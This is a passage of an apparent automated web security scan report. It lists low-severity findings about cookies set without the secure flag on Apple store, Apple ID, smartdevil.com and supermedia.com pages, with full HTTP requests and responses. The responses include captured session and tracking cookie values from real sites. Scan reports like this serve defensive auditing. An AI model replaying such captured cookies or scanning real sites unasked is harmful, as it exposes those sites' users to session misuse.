Set-Cookie: bc-visitor-id=3760177095415339810=7851714395809697412; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 20:32:21 GMT
Set-Cookie: bc-visit-id=3760177095415339810=9223372036839688863; domain=.boldchat.com; path=/
Set-Cookie: JSESSIONID=aP-3JlTQvoC6; path=/
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 20:32:21 GMT
Content-Length: 101191


   <html>
<head>
<HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" />
<!-- Overridable STYLE -->
<STYLE><!--
.print_cell, .email_cell {
   padding: 4px;
}
.email_prompt_box {
...[SNIP]...

8.2. https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appleid.apple.com
Path:   /cgi-bin/WebObjects/MyAppleId.woa

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/WebObjects/MyAppleId.woa?localang=en_US HTTP/1.1
Host: appleid.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 18:04:29 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7l
set-cookie: ISTLocale=ZW5fVVM%3D; version=1; expires=Fri, 03-Feb-2012 18:04:29 GMT; path=/
connection: close
content-length: 24701
MS-Author-Via: DAV
Content-Type: text/html; charset=UTF-8;

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


...[SNIP]...

8.3. https://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 302 Apple
Date: Thu, 03 Feb 2011 17:49:28 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
set-cookie: wosid=csKICi1o0fYy23BuHZ269hYUg3j; path=/1-800-MY-APPLE/WebObjects/AppleStore.woa;
set-cookie: woinst=920044001; path=/1-800-MY-APPLE/WebObjects/AppleStore.woa;
set-cookie: asbid=sYTT2CTKKJKACXA24; expires=Sun, 03-Feb-2041 09:49:28 GMT; path=/; domain=.apple.com;
set-cookie: asrec=InNybV91cmkiID0gImh0dHA6Ly9zdG9yZS5hcHBsZS5jb20vMS04MDAtTVktQVBQTEUvV2ViT2JqZWN0cy9BcHBsZVN0b3JlIjsKInNybV9zZXNuX2lkIiA9ICJjc0tJQ2kxbzBmWXkyM0J1SFoyNjloWVVnM2oiOwoic3JtX2luc3RfbmJyIiA9ICI5MjAwNDQwMDEiOwoic3JtX3N2ayIgPSB7Cn07CiJzcm1fYXBwX25tIiA9ICJBcHBsZVN0b3JlIjsKInNybV9leHBpcmVzIiA9ICIyMDExLzAyLzAzLTEwOjA0OjI4IjsK; path=/; domain=.apple.com;
last-modified: Thu, 03 Feb 2011 09:49:29 GMT
cache-control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
location: http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920044001/wo/csKICi1o0fYy23BuHZ269hYUg3j/0.
expires: Tue, 02 Feb 2010 09:49:29 GMT
pragma: no-cache
vary: *
connection: close
content-length: 266
Content-Type: text/html; charset=ISO-8859-1
x-frame-options: sameorigin

Redirecting to &lt;a HREF=&quot;http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920044001/wo/csKICi1o0fYy23BuHZ269hYUg3j/0.&quot;&gt;http://store.apple.com/1-800-MY-APPLE/WebObjects/Ap
...[SNIP]...

8.4. https://store.apple.com/Apple/WebObjects/OrderStatus.woa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Apple/WebObjects/OrderStatus.woa HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 18:10:45 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Sun, 30-Jan-2011 06:28:28 GMT
pragma: no-cache
set-cookie: wosid=O7XguopRkA6tCQjGACmrgg; version="1"; expires=Mon, 03-Jan-2011 18:10:45 GMT; path=/1-800-MY-APPLE/WebObjects/OrderStatus.woa
set-cookie: woinst=-1; version="1"; expires=Mon, 03-Jan-2011 18:10:45 GMT; path=/1-800-MY-APPLE/WebObjects/OrderStatus.woa
connection: close
content-length: 13819
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-frame-options: sameorigin


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Apple Order Status</title>

<meta name="robots
...[SNIP]...

8.5. https://store.apple.com/us/sentryx/sign_in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /us/sentryx/sign_in

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/sentryx/sign_in?_a=login.guestSign&c=f63ef1babc027e38d46ff1531c1e3f73&_fid=si&r=SXYD4UDAPXU7P7KXF&s=ba6fdbd16f511f7872ee65ac03f444f3&t=SXYD4UDAPXU7P7KXF HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:11:28 GMT
Cache-Control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
Expires: Wed, 02 Feb 2011 18:11:28 GMT
content-type: application/x-json; charset=UTF-8; encoding=UTF8
Vary: *
pragma: no-cache
Date: Thu, 03 Feb 2011 18:11:28 GMT
set-cookie: ltn_SXA4A99949C7A94X9=0aos0mjpVqOL2BzDUXfnJUSFDYuYgnOBoM39tQz7UpyRsimhbb7o2LNPbnWHvUjjtBcbHIffRFaMVePAxVcXSFXSKuPEllj%2BV5hPAht3UszjNdTYScSIr4nIcVzzAYdn41SQG6tXqJijBiMuE3veDa/QTvIYblRtIPnkxIibyeQQECKIn6MvJC8DJCJ86V9vISSdFv9k3/HtQAvvUCItpea3LQ%3D%3D; version="1"; path=/; domain=store.apple.com; HttpOnly
set-cookie: sltn_5319def7_SXA4A99949C7A94X9=f67dfea5bc895de3fa43a18838357b1e6e1ff34d; version="1"; path=/; domain=store.apple.com; secure; HttpOnly
x-request-id: 74f5066e-2161-4b02-b83c-70513839838b
Content-Length: 108
x-frame-options: sameorigin

{"body":{},"head":{"status":"302","data":{"url":"https://store.apple.com/us/checkout/start?pltn=9062BCEB"}}}

8.6. https://www.smartdevil.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21218
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:36 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

8.7. https://www.smartdevil.com/Home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:39 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

8.8. https://www.smartdevil.com/SSLLogin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /SSLLogin.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SSLLogin.aspx HTTP/1.1
Host: www.smartdevil.com
Connection: keep-alive
Referer: https://www.smartdevil.com/SSLLogin/tabid/116/Default.aspx?returnurl=%2fdefault.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; __utmc=269707379; __utmb=269707379.1.10.1296764098; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:47:34 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:27:34 GMT
Content-Length: 24206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

8.9. https://www.smartdevil.com/SSLLogin/tabid/116/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /SSLLogin/tabid/116/Default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SSLLogin/tabid/116/Default.aspx?returnurl=%2fdefault.aspx HTTP/1.1
Host: www.smartdevil.com
Connection: keep-alive
Referer: http://www.smartdevil.com/
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; __utmc=269707379; __utmb=269707379.1.10.1296764098; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:44:23 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:24:26 GMT
Content-Length: 24270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

8.10. https://www.smartdevil.com/SSLLogin/tabid/116/ctl/SendPassword/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /SSLLogin/tabid/116/ctl/SendPassword/Default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SSLLogin/tabid/116/ctl/SendPassword/Default.aspx?returnurl=%2fSSLLogin.aspx HTTP/1.1
Host: www.smartdevil.com
Connection: keep-alive
Referer: https://www.smartdevil.com/SSLLogin.aspx
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; __utmc=269707379; __utmb=269707379.1.10.1296764098; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:47:46 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:27:45 GMT
Content-Length: 19545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

8.11. https://www.smartdevil.com/privacy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /privacy.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy.aspx HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32544
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:40 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

8.12. https://www.smartdevil.com/terms.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /terms.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /terms.aspx HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49241
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:40 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

8.13. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

